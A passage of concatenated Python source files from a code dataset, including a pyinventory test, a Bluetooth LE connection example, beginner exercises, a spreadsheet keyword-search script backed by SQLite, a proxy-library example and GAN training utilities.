this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\n\n\nfrom pyinventory.api.equipment import (\n add_equipment,\n get_equipment,\n get_or_create_equipment,\n)\nfrom pyinventory.api.equipment_type import (\n add_equipment_type,\n delete_equipment_type_with_equipments,\n)\nfrom pyinventory.api.location import add_location\nfrom pyinventory.api.location_type import (\n add_location_type,\n delete_location_type_with_locations,\n)\n\nfrom .utils.base_test import BaseTest\n\n\nclass TestEquipment(BaseTest):\n def setUp(self) -> None:\n super().setUp()\n self.location_types_created = []\n self.location_types_created.append(\n add_location_type(\n self.client,\n \"City\",\n [(\"Mayor\", \"string\", None, True), (\"Contact\", \"email\", None, True)],\n )\n )\n self.equipment_types_created = []\n self.equipment_types_created.append(\n add_equipment_type(\n self.client,\n \"Tp-Link T1600G\",\n \"Router\",\n [(\"IP\", \"string\", None, True)],\n {},\n [],\n )\n )\n self.location = add_location(\n self.client,\n [(\"City\", \"Lima\")],\n {\"Mayor\": \"Bernard King\", \"Contact\": \"limacity@peru.pe\"},\n 10,\n 20,\n )\n\n def tearDown(self) -> None:\n for equipment_type in self.equipment_types_created:\n delete_equipment_type_with_equipments(self.client, equipment_type)\n for location_type in self.location_types_created:\n delete_location_type_with_locations(self.client, location_type)\n\n def test_equipment_created(self) -> None:\n\n equipment = add_equipment(\n self.client,\n \"TPLinkRouter\",\n \"Tp-Link T1600G\",\n self.location,\n {\"IP\": \"127.0.0.1\"},\n )\n fetched_equipment = get_equipment(self.client, \"TPLinkRouter\", self.location)\n self.assertEqual(equipment, fetched_equipment)\n\n def test_get_or_create_equipment(self) -> None:\n equipment = get_or_create_equipment(\n self.client,\n \"TPLinkRouter\",\n \"Tp-Link T1600G\",\n self.location,\n {\"IP\": \"127.0.0.1\"},\n )\n equipment2 = get_or_create_equipment(\n self.client,\n \"TPLinkRouter\",\n \"Tp-Link T1600G\",\n self.location,\n {\"IP\": \"127.0.0.1\"},\n )\n self.assertEqual(equipment, equipment2)\n","sub_path":"symphony/cli/tests/pyinventory_tests/test_equipment.py","file_name":"test_equipment.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"45363653","text":"import asyncio\nfrom aioble import Device\nfrom aioble import CentralManager\n\nTEST_ADDRESS_10 = \"D7:D1:17:78:FB:D0\"\nTEST_ADDRESS_12 = \"77:6C:8E:86:6B:5A\"\n\nTEST_ADDRESS_5 = \"D4:D2:34:E3:BC:C5\"\nTEST_NOTIFY_CHARACTERISTIC = \"ee840202-43b7-4f65-9fb9-d7b92d683e36\"\nTEST_WRITE_CHARACTERISTIC = \"ee840203-43b7-4f65-9fb9-d7b92d683e36\"\n\nTEST_READ_CHAR = \"00002902-0000-1000-8000-00805f9b34fb\"\n\nTIMEOUT_SEC = 5\n\nconfig = [100, 0, 100, 0, 200, 0, 56, 255, 200, 0, 56, 255, 0]\nWRITE_CHAR_TEST = bytearray(config)\n\nd_10_device = None\nd_5_device = None\n\n\ndef notify_callback_10(sender, data):\n values = int.from_bytes(data, byteorder=\"little\", signed=True)\n print(f\"10: {sender}: {values}\")\n\n\ndef notify_callback_5(sender, data):\n values = int.from_bytes(data, byteorder=\"little\", signed=True)\n print(f\"5: {sender}: {values}\")\n\n\ndef scan_callback_10(device, device_address, device_name):\n global d_10_device\n print(\n \"device: {0} device_address: {1} device_name: {2}\".format(\n device, device_address, device_name\n )\n )\n if device_address == TEST_ADDRESS_10:\n d_10_device = device\n\n\ndef scan_callback_all(device, device_address, device_name):\n global d_10_device\n global d_5_device\n print(\n \"device: {0} device_address: {1} device_name: {2}\".format(\n device, device_address, device_name\n )\n )\n if device_address == TEST_ADDRESS_10:\n d_10_device = device\n if device_address == TEST_ADDRESS_5:\n d_5_device = device\n\n\ndef connect_callback_10():\n print(\"Connection to Device 10 Succeeded\")\n\n\ndef disconnect_callback_10(address):\n print(\n \"Disconnection From Device 10 Succeeded, address: {0}\".format(address)\n )\n\n\ndef services_resolved_10():\n print(\"Services Resolved for Device 10\")\n\n\ndef connect_callback_5():\n print(\"Connection to Device 5 Succeeded\")\n\n\ndef disconnect_callback_5(address):\n print(\n \"Disconnection From Device 5 Succeeded, address: {0}\".format(address)\n )\n\n\ndef services_resolved_5():\n print(\"Services Resolved for Device 5\")\n\n\nasync def connect_one():\n try:\n # Find Device\n cm_10 = CentralManager()\n await cm_10.start_scan(scan_callback_10)\n\n while d_10_device is None:\n await asyncio.sleep(0.1)\n\n await cm_10.stop_scan()\n\n # Create Device\n d_10 = Device(d_10_device)\n\n d_10.connect_succeeded = connect_callback_10\n d_10.disconnect_succeeded = disconnect_callback_10\n d_10.services_resolved = services_resolved_10\n\n print(\"Connecting\")\n\n try:\n await asyncio.wait_for(d_10.connect(), TIMEOUT_SEC)\n except asyncio.TimeoutError:\n raise Exception(\"Device was not found.\")\n print(\"Disconnecting\")\n await d_10.disconnect()\n\n is_d_10 = await d_10.is_connected()\n print(f\"Connected_10: {is_d_10}\")\n\n print(\"Writing Char\")\n await d_10.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n\n print(\"Reading Descriptor\")\n print(await d_10.read_descriptor(TEST_NOTIFY_CHARACTERISTIC))\n\n print(\"Starting Notify\")\n await d_10.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_10)\n\n await asyncio.sleep(2)\n\n print(\"Stopping Notify\")\n await d_10.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n\n print(\"Disconnecting\")\n await d_10.disconnect()\n\n is_d_10 = await d_10.is_connected()\n print(f\"Connected_10: {is_d_10}\")\n\n except Exception as ex:\n print(f\"Exception, Failed to Connect: {ex}\")\n\n\nasync def connect_two():\n try:\n # Find Devices\n cm_all = CentralManager()\n await cm_all.start_scan(scan_callback_all)\n\n while d_10_device is None or d_5_device is None:\n await asyncio.sleep(0.1)\n\n await cm_all.stop_scan()\n\n print(d_10_device)\n print(d_5_device)\n\n # Create Devices\n d_10 = Device(d_10_device)\n d_5 = Device(d_5_device)\n\n d_10.connect_succeeded = connect_callback_10\n d_10.disconnect_succeeded = disconnect_callback_10\n d_10.services_resolved = services_resolved_10\n\n d_5.connect_succeeded = connect_callback_5\n d_5.disconnect_succeeded = disconnect_callback_5\n d_5.services_resolved = services_resolved_5\n\n print(\"Connecting\")\n tasks = [d_10.connect(), d_5.connect()]\n done, pending = await asyncio.wait(\n tasks, timeout=TIMEOUT_SEC, return_when=asyncio.ALL_COMPLETED\n )\n\n if pending:\n raise Exception(\"Could not connect to both devices.\")\n\n is_d_10 = await d_10.is_connected()\n is_d_5 = await d_5.is_connected()\n print(f\"Connected_10: {is_d_10} Connected_5: {is_d_5}\")\n\n print(\"Writing Char\")\n await d_10.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n await d_5.write_char(TEST_WRITE_CHARACTERISTIC, WRITE_CHAR_TEST)\n\n print(\"Reading Char\")\n print(await d_10.read_char(TEST_WRITE_CHARACTERISTIC))\n print(await d_5.read_char(TEST_WRITE_CHARACTERISTIC))\n\n print(\"Starting Notify\")\n await d_5.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_5)\n await d_10.start_notify(TEST_NOTIFY_CHARACTERISTIC, notify_callback_10)\n\n await asyncio.sleep(5)\n\n print(\"Stopping Notify\")\n await d_5.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n await d_10.stop_notify(TEST_NOTIFY_CHARACTERISTIC)\n\n print(\"Disconnecting\")\n await d_10.disconnect()\n await d_5.disconnect()\n\n is_d_10 = await d_10.is_connected()\n is_d_5 = await d_5.is_connected()\n print(f\"Connected_10: {is_d_10} Connected_5: {is_d_5}\")\n\n except Exception as ex:\n print(f\"Exception, Failed to Connect: {ex}\")\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(connect_one())\n","sub_path":"examples/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105242282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 21 23:16:09 2019\r\n\r\n@author: mahtab faraji\r\nwww.onlinebme.com\r\n\"\"\"\r\n#Write a program that accepts a comma separated sequence of words as input and prints the words in a comma-separated sequence after sorting them alphabetically.\r\n#Suppose the following input is supplied to the program:\r\n#without,hello,bag,world\r\n#Then, the output should be:\r\n#bag,hello,without,world\r\n\r\nx=input('Enter the first number: ')\r\nmy_list=x.split(',')\r\nsort_list=sorted(my_list)\r\nnew_str=','.join(sort_list)\r\nprint(new_str)\r\n","sub_path":"project8.py","file_name":"project8.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423491507","text":"'''\n3.\nCard 클래스를 생성해 카드에 충전기능, 소비기능, 잔액을 알려주는 기능을 넣으시오.\n-충전기능 (charge)\n-소비기능 (consume)\n-영화관에서 카드를 사용하면 20% 할인율 적용\nprint 기능(print) # 잔액이 ( ) 원 입니다.\n\n테스트코드\n<입력>\ncard = Card()\ncard.charge(20000)\ncard.consume(3000,'마트')\ncard.consume(10000,'영화관')\ncard.consume(13000,'마트')\ncard.print()\n\n<출력>\n잔액이 20000원 입니다.\n마트에서 3000원 사용했습니다.\n영화관에서 8000원 사용했습니다.\n잔액이 부족합니다\n잔액이 9000원 입니다.\n'''\n\n\nclass Card:\n def __init__(self):\n self.money = 0\n\n def charge(self, num):\n self.money += num\n\n def consume(self, num, x):\n\n if x == '영화관':\n if self.money - num * 0.8 < 0:\n print(\"잔액이 부족합니다.\")\n\n else:\n self.money -= num * 0.8\n print(\"{}에서 {:.0f}원 사용했습니다.\".format(x, num * 0.8))\n\n else:\n if self.money - num < 0:\n print(\"잔액이 부족합니다.\")\n\n else:\n self.money -= num\n print(\"{}에게 {:.0f}원 사용했습니다.\".format(x, num))\n\n def print(self):\n print('잔액이 {:.0f}입니다.'.format(self.money))\n\n\ncard = Card()\ncard.charge(20000)\ncard.print()\ncard.consume(3000, '마트')\ncard.consume(10000, '영화관')\ncard.consume(13000, '마트')\ncard.print()\n","sub_path":"quiz/quiz2_3.py","file_name":"quiz2_3.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"271747651","text":"import os\nimport re\nimport sqlite3\nfrom sys import getfilesystemencoding\nimport re\nfrom datetime import datetime\nfrom random import randint\nfrom time import sleep\n\n#Third Party\nfrom tqdm import tqdm\nimport xlrd\nfrom xlrd.sheet import ctype_text\n\nclass DatabaseManager:\n def __init__(self, working_dir):\n self.working_dir = working_dir\n self.output_dir = os.path.join(self.working_dir, \"Output\")\n self.db = os.path.join(self.working_dir, \"ExcavationPack.db\")\n self.log_file = os.path.join(self.output_dir, \"log_excel.txt\")\n self.system_encoding = getfilesystemencoding()\n\n def check_database(self):\n \"\"\"\n Checks multiple times to see if the database exists or not\n Exits the script if it does not exist\n Currently does a file check, will need some other method\n if a remote database is used\n \"\"\"\n attempts = 0\n while attempts < 3:\n try:\n if os.path.isfile(self.db):\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]Database exists.\".format(self.check_database.__name__))\n log_file.write('\\n')\n return self.db\n else:\n attempts += 1\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]Database does not exist\".format(self.check_database.__name__))\n log_file.write('\\n')\n sleep(10)\n\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self.check_database.__name__, str(e)))\n log_file.write('\\n')\n return False\n \n return False\n\nclass SearcherExcelLegacy:\n\n def __init__(self, working_dir, database):\n self.working_dir = working_dir\n self.output_dir = os.path.join(self.working_dir, \"Output\")\n self.results_dir = os.path.join(self.output_dir, \"Results\") # Directory to place results\n self.log_file = os.path.join(self.output_dir, \"log_excel_legacy.txt\")\n self.system_encoding = getfilesystemencoding()\n self.db = database\n self.keywords_file = os.path.join(self.working_dir, \"keywords.txt\") # File containing the keywords which will be searched for\n self.keywords = set()\n with open(self.keywords_file) as file:\n for line in file:\n self.keywords.add(line.strip())\n\n def _load_values(self):\n attempts = 0\n while attempts < 3:\n try:\n # States\n self.categorizing = self._sql_select_state_category(\"Categorizing\")\n self.categorized = self._sql_select_state_category(\"Categorized\")\n self.processing = self._sql_select_state_category(\"Processing\")\n self.processed = self._sql_select_state_category(\"Processed\")\n self.error = self._sql_select_state_category(\"Error\")\n\n # Data Categories\n self.gzip = self._sql_select_data_category(\"Gzip\")\n self.excel = self._sql_select_data_category(\"Excel\")\n self.excellegacy = self._sql_select_data_category(\"ExcelLegacy\")\n self.pdf = self._sql_select_data_category(\"Pdf\")\n self.plaintext = self._sql_select_data_category(\"Plaintext\")\n self.word = self._sql_select_data_category(\"Word\")\n self.notsupported = self._sql_select_data_category(\"NotSupported\")\n self.notdetermined = self._sql_select_data_category(\"NotDetermined\")\n self.duplicate = self._sql_select_data_category(\"Duplicate\")\n self.data_error = self._sql_select_data_category(\"Error\")\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success] Loaded all values.\".format(self._load_values.__name__))\n log_file.write('\\n')\n return True\n except Exception as e:\n attempts += 1\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed] Attempting to load again.{}\".format(self._load_values.__name__, str(e)))\n log_file.write('\\n')\n sleep(20)\n \n if attempts == 3:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed] All attempts to load have failed. --- {}\".format(self._load_values.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_ready(self, DataCategoryID, StateID):\n \"\"\"\n Selects and returns the FileName and FileHash from the database for all file with a certain state. \n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"\n SELECT categorization.FileHash, categorization.FileName\n FROM categorization\n INNER JOIN state\n ON categorization.FileHash = state.FileHash\n where DataCategoryID = {DataCategoryID}\n AND StateID = {StateID}\n ORDER BY RANDOM()\n ;\n \"\"\"\n cursor.execute(sql)\n files = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_ready.__name__))\n log_file.write('\\n')\n return files\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_ready.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_data_category(self, DataCategory):\n \"\"\"\n Used to check the state of the data\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT ID FROM data_categories WHERE DataCategory = \"{DataCategory}\";\"\"\"\n cursor.execute(sql)\n data_id = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_data_category.__name__))\n log_file.write('\\n')\n return data_id[0][0]\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_data_category.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_state_category(self, StateCategory):\n \"\"\"\n Used to check the state of the data\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT ID FROM state_categories WHERE StateCategory = \"{StateCategory}\";\"\"\"\n cursor.execute(sql)\n state_id = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_state_category.__name__))\n log_file.write('\\n')\n return state_id[0][0]\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_state_category.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_state(self, FileHash):\n \"\"\"\n Used to check the state of the data.\n If found, returns the state, otherwise an empty list.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT StateID FROM state WHERE FileHash = \"{FileHash}\";\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_state.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_state.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_processing_status(self):\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT * FROM state WHERE StateId = {self.processing};\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_processing_status.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_processing_status.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_load_status(self):\n \"\"\"\n Used to check the state of completion for the data categorizer\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"SELECT AllLoaded FROM load_status WHERE AllLoaded = 0;\"\"\"\n cursor.execute(sql)\n state = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_load_status.__name__))\n log_file.write('\\n')\n if state:\n state = state[0][0]\n return state\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_load_status.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_select_all_category(self, DataCategoryID):\n \"\"\"\n Selects and returns the FileName and FileHash from the database for all entries with a specific DataCategoryID\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n # Data to Select\n sql = f\"\"\"\n SELECT FileHash, FileName\n FROM categorization \n WHERE DataCategoryID = {DataCategoryID}\n ORDER BY RANDOM();\"\"\"\n ## Random order helps processors avoid starting on the same file\n cursor.execute(sql)\n files = cursor.fetchall()\n conn.close()\n # Returning Filename and FileHash\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_select_all_category.__name__))\n log_file.write('\\n')\n return files\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_select_all_category.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_update_state(self, FileHash, StateID):\n \"\"\"\n Updates text files in the database as needed using the unique FileHash.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n #Data to Update\n sql = f\"\"\"\n UPDATE state\n SET StateID = {StateID}\n WHERE FileHash = \"{FileHash}\"\n \"\"\"\n cursor.execute(sql)\n # Commit and Close\n conn.commit()\n conn.close()\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_update_state.__name__))\n log_file.write('\\n')\n return True\n\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_update_state.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _sql_insert_statistics(self, FileHash, ProcessingStartTime, ProcessingEndTime, ElapsedTime):\n \"\"\"\n Updates text files in the database as needed using the unique FileHash.\n \"\"\"\n try:\n # Connect to database\n conn = sqlite3.connect(self.db)\n cursor = conn.cursor()\n #Data to Update\n sql = f\"\"\"\n INSERT OR IGNORE INTO statistics \n VALUES (\n \"{FileHash}\", \n \"{ProcessingStartTime}\",\n \"{ProcessingEndTime}\",\n \"{ElapsedTime}\"\n );\n \"\"\"\n cursor.execute(sql)\n # Commit and Close\n conn.commit()\n conn.close()\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]\".format(self._sql_insert_statistics.__name__))\n log_file.write('\\n')\n return True\n\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failed]{}\".format(self._sql_insert_statistics.__name__, str(e)))\n log_file.write('\\n')\n return False\n\n def _search_excel_legacy(self, filename):\n \"\"\"\n Searches a legacy excel file using the keywords list included in the class. \n Writes findings to a file, using the keyword as the filename. \n Assumes files are XLS format. \n \"\"\"\n try:\n wb = xlrd.open_workbook(filename)\n sheets = wb.sheet_names()\n for sheet_name in sheets:\n ws = wb.sheet_by_name(sheet_name)\n for row_idx in range(0, ws.nrows): # Iterate through rows\n for col_idx in range(0, ws.ncols): # Iterate through columns\n cell = ws.cell(row_idx, col_idx) # Get cell object by row, col\n if cell.value: # Ignore empty cells\n for keyword in self.keywords:\n if re.search(keyword, str(cell.value), re.IGNORECASE):\n keyword_result_file = os.path.join(self.results_dir, keyword + \".txt\")\n with open(keyword_result_file, 'a') as krs:\n # file_basename = os.path.split(filename)[1] #Only the filename\n result = filename + \"---\" + cell.value\n krs.write(result)\n krs.write(\"\\n\")\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Success]{}\".format(self._search_excel_legacy.__name__,filename))\n log_file.write('\\n')\n return True\n except Exception as e:\n with open(self.log_file, 'a', encoding=self.system_encoding) as log_file:\n log_file.write(\"[{} Failure]{} --- {}\".format(self._search_excel_legacy.__name__,filename, str(e)))\n log_file.write('\\n')\n return False\n\n def process_excel_legacy(self):\n # Allowing some time for the DB to be set up, need a better way to handle this\n sleep(60)\n self._load_values()\n\n allloaded = self._sql_select_load_status()\n categorizing = self._sql_select_all_category(self.notdetermined)\n processing = self._sql_select_processing_status()\n\n while allloaded == 0 or categorizing or processing:\n files = self._sql_select_ready(self.excellegacy, self.categorized) #Must match the database value\n if files:\n for filehash, filename in tqdm(files, desc=\"Progress\"):\n ProcessingStartTime = datetime.now()\n if self._search_excel_legacy(filename):\n ProcessingEndTime = datetime.now()\n ElapsedTime = ProcessingEndTime - ProcessingStartTime\n self._sql_update_state(filehash, self.processed)\n self._sql_insert_statistics(filehash, ProcessingStartTime, ProcessingEndTime, ElapsedTime)\n else:\n self._sql_update_state(filehash, self.error)\n\n allloaded = self._sql_select_load_status()\n categorizing = self._sql_select_all_category(self.notdetermined)\n sleep(30)\n \ndef main():\n working_dir = \"Data\"\n \n dbm = DatabaseManager(working_dir)\n db = dbm.check_database()\n if db is False:\n exit()\n \n searcher = SearcherExcelLegacy(working_dir, db)\n searcher.process_excel_legacy()\n\nif __name__ == \"__main__\":\n main()","sub_path":"SearcherExcelLegacy/SearcherExcelLegacy.py","file_name":"SearcherExcelLegacy.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"390608624","text":"from autoproxy import Proxy, Config\n\np = Proxy(url = \"http://twitter.com\")\np.filter()\n\n# This method will not keep track of how many times you've used the proxies.\nfor i in p.proxies:\n print(i)\n\n# To keep track of proxy use, instead, use:\nprint(p.use_proxy())\n\n# Notice on running this, the last proxy `used` value will be 1.\n","sub_path":"examples/example_proxies.py","file_name":"example_proxies.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234556599","text":"import pickle\nimport random\nimport tqdm\nimport torch\nimport operator\nimport cv2\nimport glob\nfrom PIL import Image\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport numpy as np\nimport time\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nimport torch.autograd as autograd\nimport matplotlib.pyplot as plt\nfrom torchvision.utils import save_image\nimport os\ndef pickle_dump(obj,path):\n with open(path,mode=\"wb\") as f:\n pickle.dump(obj, f)\ndef pickle_load(path):\n with open(path,mode=\"rb\") as f:\n data=pickle.load(f)\n return data\ndef return_index(label,weight):\n dice = list(range(len(label)))\n # 6の目が出やすいように重みを設定する\n if len(weight) == 0:\n samples = random.choices(dice)\n else:\n samples = random.choices(dice, k=1, weights=[1 /w **2 for w in weight])\n return samples\ndef label_preprocess(text):\n global tag_vectors\n text=text.replace(\"-\", \" \")\n tokens=text.split()\n return tokens\ndef tile_like(x, img):\n x = x.view(x.size(0), x.size(1), 1, 1)\n x = x.repeat(1, 1, img.size(2), img.size(3))\n return x\ndef check_coverage(vocab, embeddings_index):\n a = {}\n oov = {}\n k = 0\n i = 0\n for word in tqdm.tqdm(vocab):\n try:\n a[word] = embeddings_index[word]\n k += vocab[word]\n except:\n oov[word] = vocab[word]\n i += vocab[word]\n pass\n\n print('Found embeddings for {:.2%} of vocab'.format(len(a) / len(vocab)))\n print('Found embeddings for {:.2%} of all text'.format(k / (k + i)))\n sorted_x = sorted(oov.items(), key=operator.itemgetter(1))[::-1]\n\n return sorted_x\n\ndef compute_gradient_penalty(D, real_samples, fake_samples, Tensor, label = None, char_class = None):\n \"\"\"Calculates the gradient penalty loss for WGAN GP.\n Warning: It doesn't compute the gradient w.r.t the labels, only w.r.t\n the interpolated real and fake samples, as in the WGAN GP paper.\n \"\"\"\n # Random weight term for interpolation between real and fake samples\n alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))\n # Get random interpolation between real and fake samples\n interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)\n d_interpolates = D(interpolates)[0].view(-1, 1)\n fake = Tensor(d_interpolates.shape[0], 1).fill_(1.0)\n fake.requires_grad = False\n # Get gradient w.r.t. interpolates\n gradients = autograd.grad(\n outputs=d_interpolates,\n inputs=interpolates,\n grad_outputs=fake,\n create_graph=True,\n retain_graph=True,\n only_inputs=True,\n )\n gradients = gradients[0].view(gradients[0].size(0), -1)\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n del gradients, d_interpolates\n return gradient_penalty\ndef Generate_img(epoch, G_model, ID, device, source_img, noise, label, log_dir):\n label = Multilabel_OneHot(label, len(ID))\n G_model.eval()\n with torch.no_grad():\n source_img = source_img\n # source_img = torch.cat([tensor.expand(len(label), z_dim) for tensor in torch.chunk(source_img, 5, dim=0)], axis=0)\n #Generatorでサンプル生成\n noise = noise.expand(len(source_img), -1, -1, -1)\n label = label.to(device)\n samples = G_model(noise, source_img, label)[0].data.cpu()\n samples = torch.cat([source_img[0:26].data.cpu(), (samples/2)+0.5], dim = 0)\n save_image(samples,os.path.join(log_dir, 'epoch_%05d.png' % (epoch)), nrow = 26)\ndef loss_plot(log_dir,D_loss_list,G_loss_list):\n fig = plt.figure(figsize=(10,7))\n loss = fig.add_subplot(1,1,1)\n loss.plot(range(len(D_loss_list)),D_loss_list,label='Discriminator_loss')\n loss.plot(range(len(G_loss_list)),G_loss_list,label='Generator_loss')\n loss.set_xlabel('epoch')\n loss.set_ylabel('loss')\n loss.legend()\n loss.grid()\n fig.show()\n plt.show()\n fig.savefig(os.path.join(log_dir,\"train_loss.png\"))\ndef make_randomwalk(log_dir):\n files = sorted(glob.glob(os.path.join(log_dir,'logs_cWGAN/epoch_*.png')))\n images = list(map(lambda file : Image.open(file) , files))\n images[0].save(os.path.join(log_dir,'randomwalk.gif') , save_all = True , append_images = images , duration = 100 , loop = 0)\ndef split_list(l, n):\n for idx in range(0,len(l),n):\n yield l[idx:idx+n]\ndef pseudo_hamming(v1, v2):\n start_time=time.time()\n v1 = v1.reshape(-1,64,64)\n v2 = v2.reshape(-1,64,64)\n bin_img1 = np.where(v1 > 127, 255, 0).astype(np.uint8)\n bin_img2 = np.where(v2 > 127, 255, 0).astype(np.uint8)\n mask_img1 = np.where(bin_img1 > 127, 0, 1).astype(np.uint8)\n mask_img2 = np.where(bin_img2 > 127, 0, 1).astype(np.uint8)\n dist_img1 = np.array([cv2.distanceTransform(b1, cv2.DIST_L2, 3) for b1 in bin_img1])\n dist_img2 = np.array([cv2.distanceTransform(b2, cv2.DIST_L2, 3) for b2 in bin_img2])\n masked_dist_img1 = np.multiply(dist_img1, mask_img2)\n masked_dist_img2 = np.multiply(dist_img2, mask_img1)\n merged_masked_dist_img = masked_dist_img1 + masked_dist_img2\n total = np.sum(merged_masked_dist_img)\n end_time =time.time()\n return total\ndef learning_curve(dict, path, title ='learning_curve', x_label = 'epoch', y_label = 'loss'):\n plt.figure()\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n # Traing score と Test score をプロット\n for key, value in dict.items():\n plt.plot(range(len(value)), np.array(value), label=str(key))\n plt.legend()\n plt.savefig(path)\n plt.clf()\n plt.close()\ndef mean_average_precision(y_pred, y_true):\n average_precisions = []\n device = y_pred.device\n # クラス単位でAPを計算\n y_true = y_true.T\n y_pred = 